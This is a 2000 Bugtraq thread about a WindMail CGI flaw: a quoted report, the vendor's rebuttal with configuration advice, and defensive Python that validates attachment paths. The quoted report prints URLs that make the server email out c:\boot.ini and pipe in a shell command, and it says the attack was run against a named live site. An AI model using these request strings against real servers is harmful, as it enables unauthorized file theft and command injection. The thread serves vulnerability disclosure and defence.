Bugtraq mailing list archives
Re: Windmail allow web user get any file
From: benc () GEOCEL COM (Ben Camp)
Date: Fri, 31 Mar 2000 11:43:25 -0600
In response to the following message:
Date: Sat, 25 Mar 2000 22:41:46 -0000
From: Frankie Zie <frankie () CNNS NET>
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Windmail allow web user get any file

I found some vulnerabilities if windmail runs as a CGI application. Tested on WindowsNT 4.0, Windmail 3.05 successfully.

WindMail is a 32-bit Windows console program by geocel that gives you command-line e-mail messaging capability. You can download an evaluation copy of WindMail 3.0 at:
http://www.geocel.com/download/wmail301e.exe

WindMail has a feature that allows mailing HTML form results from CGI scripts. I found windmail doesn't check either the attachment file or special characters in parameters, which allows you to execute arbitrary commands that the web user can do:

http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20yourmail () mail com%20|%20dir%20c:\

After the request, windmail will send c:\boot.ini to yourmail () mail com and execute the "dir c:\" command.

For example:
http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%20chinahack () 163 net

After a while, check chinahack () 163 net; I got a copy of boot.ini from www.metro.net

pp () cnns net
http://www.cnns.net
There are two issues presented here, and since they're unrelated I'll approach them separately. First is a reported pipe vulnerability, then a remote file send vulnerability.

1. REPORTED PIPE VULNERABILITY

I tried this a variety of ways, and even with other executables. IF this exists at all (I could not duplicate the execution of anything) it is most likely a GAPING IIS hole. Piping happens at the command interpreter level (before windmail is ever handed its portion of the command line). I tried a variety of methods to do this w/ his instructions (posted and sent to me previously) and have had zero luck. Additionally, because of the way IIS creates CGIs w/o real STDIO handles I seriously doubt that this is possible. If someone can demonstrate otherwise I'm very interested.

This bug was removed from SECURITYFOCUS.COM for these reasons (irreproducible / not WindMail related).

Here is the final URL I was testing on:
http://localhost/windmail.exe?%20-n%20c:\boot.ini%20benc () geocel com%20|%20c:\winnt\system32\cdplayer.exe

This did not produce an instance of CDPLAYER.EXE at all. Even with the zero-security model pp () cnns net is testing under. This was tested for non-executable command shell commands (like dir) as well as other command line apps. I tested this with windmail.exe, cscript.exe, cdplayer.exe to name a few. In the above example CDPLAYER.EXE should start as a hung process. It never starts and never gets hung.

So I can say with reasonable certainty, after performing several tests and consulting with others, that this bug report is purely misinformational.

2. REMOTE FILE SEND VULNERABILITY

First let me say this, because it has already been MISREPORTED in SANS Digest. WindMail is NOT a CGI program. WindMail is NOT to be placed in your CGI-BIN directory. This has been re-categorized on SECURITYFOCUS.COM as a configuration error.

Just as you would not copy AT.EXE, CACLS.EXE, NET.EXE, NBTSTAT.EXE, etc. to your CGI-BIN, do not copy WINDMAIL.EXE to your CGI-BIN. Also, do not run your webserver as Administrator. WindMail is a command line mailer designed to work under the context of whoever is using it. Just as it would be bad to copy /bin/rm to your cgi-bin and run your HTTPD as root, it would be wrong to say this is a problem with WindMail. This is essentially a server configuration problem which makes any functional program which accepts command line arguments (and was copied to a world executable directory like cgi-bin) exploitable to some degree.

So, in a server configuration where the Web server is running as Administrator or the "System" account and where an administrator had, against the recommendations of the documentation and example scripts, copied WINDMAIL.EXE to their CGI-BIN, there exists a vulnerability where any remote user can, with the access they've been granted in the configuration, send any file as an attachment. If the server is running as Domain Administrator (or any other trusted network user), remote users will also likely be able to email remote files with UNC paths (\\server\share\file).

SUGGESTED USAGE:

1. Do not copy WINDMAIL.EXE to the CGI-BIN directory. Grant the appropriate rights to the WINDMAIL directory so that CGIs called from your web server can call WINDMAIL from its own directory.

2. Do not change the default user context which your webserver runs under (IUSR_SERVERNAME by default on IIS) if you do not understand the security implications. On IIS the permissions are rather strict by default.

3. Do not grant Execute access to directories that do not need it. This is just opening your server up to potential problems.

OTHER SUGGESTIONS:

Some users have requested that we add a constraint for which directories files can be attached from. This will be implemented in the next version and will be set in the main configuration file.

Please send any other suggestions or questions/comments/complaints to me directly at benc () geocel com. If you would like to be notified of updates/releases for WindMail and our other products email sales () geocel com.

For the record, pp () cnns net has decided not to respond to my inquiries for more information. If he has some more information on the alleged PIPE VULNERABILITY the implications are pretty large and I'd like to see it.

Thanks,

Ben Camp
benc () geocel com
Geocel International
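As an added illustration of the usage advice above (not code from this post, nor from Geocel's WindMail), here is how the CGI script that sits in front of a command-line mailer can enforce the two constraints Ben describes: attachments may only be taken from one designated directory (no ..\ traversal, no other drives, no \\server\share UNC paths), and the mailer is started with an argument list rather than a shell command line, so a "| dir c:\" appended to a parameter stays a literal string instead of becoming a pipe. The attachment directory and the mailer path are made-up values, and the "-n <file> <recipient>" argument order is copied from the report's URL purely for illustration, not as WindMail's documented syntax.

```python
import ntpath
import re

# Constructed example values (not real WindMail settings): the one directory a
# web-facing script may attach files from, and the mailer it calls.
ALLOWED_ATTACH_DIR = r"C:\inetpub\mailattach"
MAILER_EXE = r"C:\windmail\windmail.exe"

# Characters cmd.exe treats specially; none belong in a file name or address
# that is about to become a command-line argument.
SHELL_METACHARS = set('|&<>^"\r\n\0')
RECIPIENT_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def resolve_attachment(candidate, base=ALLOWED_ATTACH_DIR):
    """Return the normalized path of `candidate` if it lies inside `base`, else None.

    ntpath is used explicitly so Windows semantics (drive letters, backslashes,
    UNC prefixes) apply no matter which host runs the check.
    """
    if any(ch in SHELL_METACHARS for ch in candidate):
        return None
    # UNC paths (\\server\share\file) are refused outright: under a privileged
    # web-server account they would expose network shares, not just local files.
    if candidate.startswith(("\\\\", "//")):
        return None
    # ntpath.join() discards `base` when `candidate` is absolute (c:\boot.ini),
    # and normpath() collapses ..\ components, so the prefix test below sees the
    # real target rather than the text the caller supplied.
    full = ntpath.normpath(ntpath.join(base, candidate))
    base_norm = ntpath.normpath(base)
    if not full.lower().startswith(base_norm.lower() + "\\"):
        return None
    return full


def build_mailer_command(recipient, attachment,
                         mailer=MAILER_EXE, base=ALLOWED_ATTACH_DIR):
    """Build an argument list (never a shell string) for the mailer, or raise ValueError."""
    if not RECIPIENT_RE.match(recipient):
        raise ValueError("recipient is not a plain e-mail address")
    path = resolve_attachment(attachment, base)
    if path is None:
        raise ValueError("attachment is outside the allowed directory")
    # Handing this list to subprocess.run(..., shell=False) passes the tokens to
    # CreateProcess directly; a "|" inside a token is data, not a pipe.
    return [mailer, "-n", path, recipient]


def is_request_accepted(recipient, attachment):
    """True if the pair would be passed on to the mailer, False if it is rejected."""
    try:
        build_mailer_command(recipient, attachment)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The values from the report's URL, after URL-decoding, versus a legitimate one.
    probes = [
        ("yourmail@mail.com | dir c:\\", r"c:\boot.ini"),   # pipe in recipient
        ("yourmail@mail.com", r"c:\boot.ini"),               # absolute path outside base
        ("yourmail@mail.com", r"..\..\boot.ini"),            # traversal
        ("yourmail@mail.com", r"\\fileserver\share\secret"), # UNC path
        ("yourmail@mail.com", r"forms\result.txt"),          # inside the allowed dir
    ]
    for rcpt, attach in probes:
        verdict = "accepted" if is_request_accepted(rcpt, attach) else "rejected"
        print(f"{verdict:8} recipient={rcpt!r} attachment={attach!r}")
```

The prefix comparison is done on normalized, lower-cased paths because NTFS names are case-insensitive; a check against the raw string (or one that forgets the trailing backslash) would let a directory named mailattach2 slip past the allow-list.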